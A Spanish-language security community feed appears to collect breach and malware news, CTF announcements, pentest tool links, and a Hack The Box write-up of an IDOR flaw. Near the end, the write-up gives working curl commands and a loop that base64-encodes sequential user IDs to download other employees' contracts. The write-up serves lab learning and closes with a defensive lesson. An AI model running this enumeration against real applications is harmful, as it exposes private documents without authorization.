NUEVAS AMENAZAS DE SEGURIDAD EN EL 2026

4 VECTORES CON MAYOR TENDENCIA

Únete a la comunidad
https://registro.redseg.org

Síguenos instagram.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

🎯Nuevo reto CTF Disponible🎯 en @TheHackersLabs

🧩 Nombre: IcedID
📈 Dificultad: Avanzado
💻 Sistema Operativo: No aplica
🛡️ Categoría: Analisis de Malwares y Forense

🔗 Acceso: https://labs.thehackerslabs.com/machines/158

⚠️ QNAP Bajo Riesgo Crítico: Bypass de Autenticación en Sistemas NAS — CVE-2025-59385

https://www.linkedin.com/posts/manuel-mart%C3%ADnez-casasola-55b245289_qnap-cve-securityalert-activity-7410969797783347200-wtTW?

⚠️ Exposición de memoria en MongoDB por fallo en la gestión de compresión — CVE-2025-14847

https://www.linkedin.com/posts/manuel-mart%C3%ADnez-casasola-55b245289_mongodb-cve-securityalert-activity-7411072566699700224-jkWw

MALWARE NFC GENERADO POR IA HA SURGIDO COMO UNA NUEVA CIBERAMENAZA

Investigadores de ciberseguridad de ESET han descubierto una nueva y preocupante tendencia en ciberdelincuencia: los hackers utilizan malware generado por IA para interceptar pagos realizados a través de dispositivos con tecnología NFC (Comunicación de Campo Cercano). Este malware avanzado es capaz de transmitir datos confidenciales de tarjetas de pago, realizar compras fraudulentas en línea e incluso permitir retiros no autorizados de cajeros automáticos. Este descubrimiento pone de manifiesto cómo los ciberdelincuentes están adoptando rápidamente la inteligencia artificial para aumentar la escala y la sofisticación de sus ataques.

https://www.cybersecurity-insiders.com/study-confirms-ai-generated-nfc-malware-has-emerged-as-a-new-cyber-threat/

Únete registro.redseg.org
Suscríbase t.me/redseg
Síguenos instagram.redseg.org

@redseg @pen7esting @yilltronics

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

LA NASA HA TENIDO SUS NAVES EXPUESTAS A HACKERS DURANTE TRES AÑOS. LO HA DESCUBIERTO UNA IA EN SOLO CUATRO DÍAS

Según detallan, el fallo estaba en el sistema de autenticación y para aprovecharlo solo hacía falta disponer de credenciales de operadores. Bastaría un poco de ingeniería social como phising o infectar equipos para hacerse con nombres de usuario y contraseñas de trabajadores de la NASA para posibilitarlo.

https://www.xataka.com/espacio/nasa-ha-tenido-sus-naves-expuestas-a-hackers-durante-tres-anos-ha-descubierto-ia-solo-cuatro-dias

Únete registro.redseg.org
Suscríbase t.me/redseg
Síguenos instagram.redseg.org

@redseg @pen7esting @yilltronics

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

AUMENTA EL ROBO DE CUENTAS DE MICROSOFT 365 A TRAVÉS DE PHISHING POR CÓDIGOS DE DISPOSITIVO

Estas campañas comienzan con un mensaje inicial que incluye una URL incrustada en un botón, un texto con hipervínculo o dentro de un código QR. Cuando el usuario accede a la URL, se inicia una secuencia de ataque que aprovecha el proceso legítimo de autorización de dispositivos de Microsoft. Al usuario le llega un código de dispositivo, que puede mostrarse directamente en la página de destino o recibirse en un segundo correo electrónico enviado por el atacante. Los señuelos indican que el código es una contraseña de un solo uso (OTP) y dirigen al usuario a introducirlo en la URL de verificación de Microsoft. Cuando se hace, el token original queda validado, otorgando al atacante acceso a la cuenta de M365 objetivo.

https://cybersecuritynews.es/aumenta-el-robo-de-cuentas-de-microsoft-365-a-traves-de-phishing-por-codigos-de-dispositivo/

Únete registro.redseg.org
Suscríbase t.me/redseg
Síguenos instagram.redseg.org

@redseg @pen7esting @yilltronics

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

PRESUNTA FILTRACIÓN MASIVA DE DATOS EN LA UNIVERSIDAD NACIONAL EXPERIMENTAL DE LA SEGURIDAD (UNES) 🇻🇪

Un actor de amenazas ha publicado, en un portal de compra y venta ilegal de información, aproximadamente 1 TB de datos confidenciales pertenecientes a la UNES, institución encargada de la formación de los cuerpos de seguridad en Venezuela.

Durante este año 2025 la UNES matriculó a más de 30.000 nuevos aspirantes para ser formados.

Hasta el momento, no existe un pronunciamiento oficial por parte de las autoridades sobre la veracidad de esta filtración, la cual comprometería la seguridad y privacidad de miles de personas vinculadas a esta casa de estudios.

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

LA AGENCIA ESPACIAL EUROPEA CONFIRMA UNA VIOLACIÓN EN SUS SERVIDORES

La Agencia Espacial Europea (ESA) confirmó que atacantes recientemente violaron servidores fuera de su red corporativa, que contenían lo que describió como información "no clasificada" sobre actividades de ingeniería colaborativa.

"Llevo una semana conectándome a algunos de sus servicios y he robado más de 200 GB de datos. Además, he vaciado todos sus repositorios privados de Bitbucket", afirmaron los atacantes.

https://www.bleepingcomputer.com/news/security/european-space-agency-confirms-breach-of-external-servers/

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

Feliz año a todos 🥳

🥷🏼 𝗝𝗪𝗧 𝗔𝘂𝗱𝗶𝘁𝗼𝗿
A web pentesting tool that allows you to analyse and exploit bad implementations of JSON Web Tokens (JWT), commonly used in modern authentication systems:

👨🏽‍💻 https://github.com/dr34mhacks/jwtauditor

Cloumare
Finds origin servers of websites behind reverse proxies

🔗 https://github.com/mrh0wl/Cloudmare/

DELINCUENTES APROVECHARON EL DESCUIDO DURANTE FESTIVIDADES Y ROBARON 30 MILLONES DE EUROS (ALEMANIA)

Fuente: DW

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

HUMOR 😹

Síguenos @redseg
instagram.com/redseg_latam

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

https://github.com/Anonimo501/IDOR_Downloads/tree/main


📝 WRITE-UP COMPLETO – IDOR con referencias codificadas (Hack The Box)
1️⃣ Resumen ejecutivo
Se identificó una vulnerabilidad IDOR (Insecure Direct Object Reference) en la funcionalidad de descarga de contratos de empleados.
Aunque la aplicación no expone IDs en texto plano, utiliza codificación Base64 como referencia al objeto, lo cual no constituye un control de acceso.
Esto permitió enumerar y descargar contratos de otros empleados sin autorización, obteniendo finalmente la bandera:

HTB{***}

2️⃣ Alcance y objetivo


Aplicación: Employee Manager


Funcionalidad afectada: Descarga de contratos


Endpoint: /download.php


Objetivo: Descargar contratos de los primeros 20 empleados y localizar el archivo que contiene la bandera



3️⃣ Análisis inicial
Al acceder a:

http://SERVER_IP:PORT/contracts.php

Se observa una lista de contratos con un enlace a Employment_contract.pdf.

Al interceptar la petición con Burp Suite al descargar el contrato, se identifica:

POST /download.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

contract=MQ==

4️⃣ Análisis del código cliente (clave del ataque)
Revisando el código fuente HTML/JavaScript:

<script>
function downloadContract(uid) {
window.location = /download.php?contract=${encodeURIComponent(btoa(uid))};
}
</script>

🔍 Observaciones críticas


uid → identificador del empleado


btoa(uid) → Base64 encoding


No existe:


Validación de sesión


Verificación de propiedad del contrato


Control de acceso por usuario




👉 La referencia al objeto es predecible y controlable


5️⃣ Confirmación de la lógica de codificación
Se prueba manualmente:

echo -n 1 | base64

Resultado:

MQ==

Este valor coincide exactamente con el parámetro contract observado.

✔️ Confirmado:
contract = base64(uid)


6️⃣ Explotación (IDOR)
Descarga manual válida
⚠️ Importante: el backend requiere POST, no GET.

curl -X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "contract=MQ==" \
-OJ \
http://94.237.61.202:56565/download.php

Esto descarga:

contract_c4ca4238a0b923820dcc509a6f75849b.pdf


7️⃣ Enumeración masiva
Dado que los UID son secuenciales, se enumeran los primeros 20 empleados:

for i in {1..20}; do
echo "UID $i → $(echo -n $i | base64)"
done

Cada valor se envía al endpoint /download.php, permitiendo descargar todos los contratos, incluidos los de otros usuarios.


8️⃣ Obtención del flag
Uno de los contratos descargados contiene la bandera, accesible con:

cat contract_*.pdf

📌 Flag:

HTB{h45h1n6_1d5_***}

9️⃣ Impacto


Acceso no autorizado a documentos sensibles


Exposición de información laboral


Escalada horizontal (usuario → otros usuarios)


Vulnerabilidad crítica en entornos reales (GDPR / datos personales)



🔐 Conclusión de seguridad

La codificación NO es un mecanismo de seguridad
Base64 ≠ autorización
Hash ≠ control de acceso

Os dejo por aqui el enlace de archivos PDF con mucha info de CPTS, AD y otros mas a quien interese saludos.

https://github.com/Anonimo501/CPTS-PDFs

Tambien comparto un script que busca CVEs con POC:

https://github.com/Anonimo501/search-cve
https://github.com/Anonimo501/cve_search

DETENIDO EL HACKER RESPONSABLE DEL MALWARE KMSAuto, QUE INFECTÓ 3 MILLONES DE SISTEMAS

Las autoridades surcoreanas han detenido y extraditado a un ciudadano lituano de 29 años en relación con una extensa campaña de malware distribuido bajo la apariencia de un activador ilegal de Windows y Office que facilitó el robo de criptomonedas por valor de más de 1,5 millones de euros.

El arrestado, identificado por la Agencia de Policía Nacional surcoreana fue localizado en Georgia tras una orden internacional coordinada por Interpol y posteriormente extraditado al país asiático para responder ante la justicia.

Entre abril de 2020 y enero de 2023, el sospechoso distribuyó un ejecutable malicioso camuflado como KMSAuto, una herramienta popular en entornos pirata para activar ilegalmente Windows y Office.

En realidad, aquel archivo estaba 'troyanizado' con un malware tipo clipper que vigilaba el portapapeles de los usuarios en busca de direcciones de criptomonedas y las sustituía automáticamente por otras controladas por el atacante durante transacciones legítimas.

El malware fue descargado aproximadamente 2,8 millones de veces en todo el mundo, afectando alrededor de 3.100 billeteras vinculadas a 8.400 transacciones manipuladas. Ocho víctimas confirmadas en Corea del Sur sufrieron pérdidas por cerca de 14.000 euros.

https://www.escudodigital.com/ciberseguridad/detenido-hacker-malware-kmsauto.html

Únete a la comunidad
https://registro.redseg.org
Síguenos instagram.redseg.org
telegram.redseg.org
linkedin.redseg.org

🌐 REDSEG
Asociación Internacional
Seguridad & Tecnología
www.redseg.org

🛡️ CIBERSEG
Centro Gremial Contra La Delincuencia Tecnológica Avanzada, Cibercrimen y Amenazas Cibernéticas
ciberseg.redseg.org

🎯Nuevo reto CTF Disponible🎯 en @TheHackersLabs

🧩 Nombre: Cold Fear
📈 Dificultad: Avanzado
💻 Sistema Operativo: Linux
🛡️ Categoría: Seguridad Ofensiva

🔗 Acceso: https://labs.thehackerslabs.com/machines/162

Certificado OT gratis.

https://courses.redteamleaders.com/courses/a75c41eb-a725-4834-b188-da837cbbff88